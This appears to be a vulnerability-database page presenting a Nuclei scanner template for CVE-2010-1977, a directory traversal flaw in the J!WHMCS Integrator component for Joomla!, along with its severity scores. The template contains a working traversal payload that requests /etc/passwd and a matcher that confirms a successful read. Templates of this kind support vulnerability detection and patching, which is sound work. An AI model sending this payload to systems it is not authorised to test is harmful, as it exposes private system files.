Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-1977
HistorySep 27, 2021 - 11:02 a.m.

Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion

2021-09-2711:02:48
ProjectDiscovery
github.com
1

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

6.6 Medium

AI Score

Confidence

Low

0.008 Low

EPSS

Percentile

82.1%

A directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-1977

info:
  name: Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12083
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1977
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-1977
    cwe-id: CWE-22
    epss-score: 0.00826
    epss-percentile: 0.8192
    cpe: cpe:2.3:a:gohigheris:com_jwhmcs:1.5.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: gohigheris
    product: com_jwhmcs
  tags: cve2010,cve,edb,joomla,lfi,gohigheris

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044022050590d4500ed1b763b2bff4f98927178f7e55b44f9a1763caf7f9779d70ffa4c02206df063e8f5d1eebe7a5c628871feeff1823eb31d1b2ba1f3a16634e0e1996343:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

6.6 Medium

AI Score

Confidence

Low

0.008 Low

EPSS

Percentile

82.1%

Related for NUCLEI:CVE-2010-1977